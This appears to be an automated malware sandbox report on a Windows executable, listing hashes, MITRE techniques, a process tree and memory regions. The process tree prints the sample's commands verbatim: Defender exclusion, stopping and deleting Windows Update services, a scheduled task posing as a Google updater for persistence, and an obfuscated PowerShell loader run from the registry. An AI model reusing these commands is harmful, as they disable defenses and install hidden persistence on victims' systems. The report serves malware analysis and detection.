78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

General

Target

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe
Size

2.8MB
MD5

9253ed091d81e076a3037e12af3dc871
SHA1

ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA256

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA512

29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
SSDEEP

49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score

8^/10

evasion

Malware Config

Signatures

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

3692 sc.exe
1128 sc.exe
2244 sc.exe
216 sc.exe
2776 sc.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3036 powershell.exe
3036 powershell.exe
3540 powershell.exe
3540 powershell.exe

pid	process
3692	sc.exe
1128	sc.exe
2244	sc.exe
216	sc.exe
2776	sc.exe

pid	process
3036	powershell.exe
3036	powershell.exe
3540	powershell.exe
3540	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	3540	powershell.exe
Token: SeShutdownPrivilege	4628	powercfg.exe
Token: SeCreatePagefilePrivilege	4628	powercfg.exe
Token: SeShutdownPrivilege	2128	powercfg.exe
Token: SeCreatePagefilePrivilege	2128	powercfg.exe
Token: SeShutdownPrivilege	1344	powercfg.exe
Token: SeCreatePagefilePrivilege	1344	powercfg.exe
Token: SeShutdownPrivilege	2540	powercfg.exe
Token: SeCreatePagefilePrivilege	2540	powercfg.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.execmd.execmd.exe

description	pid	process	target process
PID 3368 wrote to memory of 3036	3368	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 3368 wrote to memory of 3036	3368	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 3368 wrote to memory of 4688	3368	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 3368 wrote to memory of 4688	3368	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 3368 wrote to memory of 3400	3368	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 3368 wrote to memory of 3400	3368	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	cmd.exe
PID 3368 wrote to memory of 3540	3368	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 3368 wrote to memory of 3540	3368	78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe	powershell.exe
PID 3400 wrote to memory of 4628	3400	cmd.exe	powercfg.exe
PID 3400 wrote to memory of 4628	3400	cmd.exe	powercfg.exe
PID 4688 wrote to memory of 3692	4688	cmd.exe	sc.exe
PID 4688 wrote to memory of 3692	4688	cmd.exe	sc.exe
PID 3400 wrote to memory of 2128	3400	cmd.exe	powercfg.exe
PID 3400 wrote to memory of 2128	3400	cmd.exe	powercfg.exe
PID 3400 wrote to memory of 1344	3400	cmd.exe	powercfg.exe
PID 3400 wrote to memory of 1344	3400	cmd.exe	powercfg.exe
PID 4688 wrote to memory of 1128	4688	cmd.exe	sc.exe
PID 4688 wrote to memory of 1128	4688	cmd.exe	sc.exe
PID 3400 wrote to memory of 2540	3400	cmd.exe	powercfg.exe
PID 3400 wrote to memory of 2540	3400	cmd.exe	powercfg.exe
PID 4688 wrote to memory of 2244	4688	cmd.exe	sc.exe
PID 4688 wrote to memory of 2244	4688	cmd.exe	sc.exe
PID 4688 wrote to memory of 216	4688	cmd.exe	sc.exe
PID 4688 wrote to memory of 216	4688	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe
"C:\Users\Admin\AppData\Local\Temp\78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3692

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1128

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2244

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:216

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2776

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1720

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:944

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:4204

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1856

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1272

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:3400

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4628

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
2⤵
PID:1708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
PID:3908

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:3708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:4316

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:1084

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d55773c3-8886-41cf-bcd7-4ef697133b52}
1⤵
PID:4084

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

1

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.8MB

MD5
eb27bb8cfa99d659e4fe023e9002ecd1

SHA1
c783400302fdfae0518269c5a5a8d4bad29f42a3

SHA256
9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

SHA512
ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5852219175a8d868d3df82d7d27b4dc5

SHA1
8f0bfcd9cd9ef634b80f1b9d335d57c02918c6d5

SHA256
af6cdf878a4101df24648712134b8e63f24f5c2a6af4c1f41c8f9b32aff819d5

SHA512
80e43e02bdc43b2ec68d6d3eecae7d8e563dea7e6b6feebde6e9f41ea0b7064981aaccf6d15fb6d554923f58f6bd66daedfc142c9e34a70bf79ba1e17ba825cc

Download Submit
memory/216-149-0x0000000000000000-mapping.dmp

Download
memory/388-181-0x00007FFC472D0000-0x00007FFC47D91000-memory.dmp

Filesize
10.8MB

Download
memory/388-170-0x00007FFC65B90000-0x00007FFC65D85000-memory.dmp

Filesize
2.0MB

Download
memory/388-180-0x00007FFC65B90000-0x00007FFC65D85000-memory.dmp

Filesize
2.0MB

Download
memory/388-168-0x00007FFC64530000-0x00007FFC645EE000-memory.dmp

Filesize
760KB

Download
memory/388-167-0x00007FFC65B90000-0x00007FFC65D85000-memory.dmp

Filesize
2.0MB

Download
memory/388-163-0x00007FFC472D0000-0x00007FFC47D91000-memory.dmp

Filesize
10.8MB

Download
memory/388-182-0x00007FFC64530000-0x00007FFC645EE000-memory.dmp

Filesize
760KB

Download
memory/388-171-0x00007FFC64530000-0x00007FFC645EE000-memory.dmp

Filesize
760KB

Download
memory/608-186-0x00007FFC25C10000-0x00007FFC25C20000-memory.dmp

Filesize
64KB

Download
memory/944-152-0x0000000000000000-mapping.dmp

Download
memory/1128-146-0x0000000000000000-mapping.dmp

Download
memory/1272-155-0x0000000000000000-mapping.dmp

Download
memory/1344-145-0x0000000000000000-mapping.dmp

Download
memory/1708-157-0x00007FF7DADD1844-mapping.dmp

Download
memory/1720-151-0x0000000000000000-mapping.dmp

Download
memory/1856-154-0x0000000000000000-mapping.dmp

Download
memory/2128-142-0x0000000000000000-mapping.dmp

Download
memory/2244-148-0x0000000000000000-mapping.dmp

Download
memory/2540-147-0x0000000000000000-mapping.dmp

Download
memory/2776-150-0x0000000000000000-mapping.dmp

Download
memory/3036-132-0x0000000000000000-mapping.dmp

Download
memory/3036-133-0x000001DD65BB0000-0x000001DD65BD2000-memory.dmp

Filesize
136KB

Download
memory/3036-135-0x00007FFC46E40000-0x00007FFC47901000-memory.dmp

Filesize
10.8MB

Download
memory/3036-134-0x00007FFC46E40000-0x00007FFC47901000-memory.dmp

Filesize
10.8MB

Download
memory/3400-137-0x0000000000000000-mapping.dmp

Download
memory/3540-156-0x00007FFC470F0000-0x00007FFC47BB1000-memory.dmp

Filesize
10.8MB

Download
memory/3540-138-0x0000000000000000-mapping.dmp

Download
memory/3540-143-0x00007FFC470F0000-0x00007FFC47BB1000-memory.dmp

Filesize
10.8MB

Download
memory/3692-141-0x0000000000000000-mapping.dmp

Download
memory/3708-160-0x0000000000000000-mapping.dmp

Download
memory/3908-158-0x0000000000000000-mapping.dmp

Download
memory/3908-164-0x00007FFC472D0000-0x00007FFC47D91000-memory.dmp

Filesize
10.8MB

Download
memory/3908-161-0x00007FFC472D0000-0x00007FFC47D91000-memory.dmp

Filesize
10.8MB

Download
memory/4084-184-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4084-185-0x00007FFC65B90000-0x00007FFC65D85000-memory.dmp

Filesize
2.0MB

Download
memory/4084-172-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4084-173-0x00000001400033F4-mapping.dmp

Download
memory/4084-174-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4084-175-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/4084-177-0x00007FFC65B90000-0x00007FFC65D85000-memory.dmp

Filesize
2.0MB

Download
memory/4084-178-0x00007FFC64530000-0x00007FFC645EE000-memory.dmp

Filesize
760KB

Download
memory/4204-153-0x0000000000000000-mapping.dmp

Download
memory/4316-176-0x00000000040B0000-0x0000000004116000-memory.dmp

Filesize
408KB

Download
memory/4316-179-0x0000000004220000-0x0000000004286000-memory.dmp

Filesize
408KB

Download
memory/4316-169-0x00000000038C0000-0x00000000038E2000-memory.dmp

Filesize
136KB

Download
memory/4316-183-0x0000000004880000-0x000000000489E000-memory.dmp

Filesize
120KB

Download
memory/4316-166-0x00000000039D0000-0x0000000003FF8000-memory.dmp

Filesize
6.2MB

Download
memory/4316-162-0x00000000032F0000-0x0000000003326000-memory.dmp

Filesize
216KB

Download
memory/4628-140-0x0000000000000000-mapping.dmp

Download
memory/4688-136-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing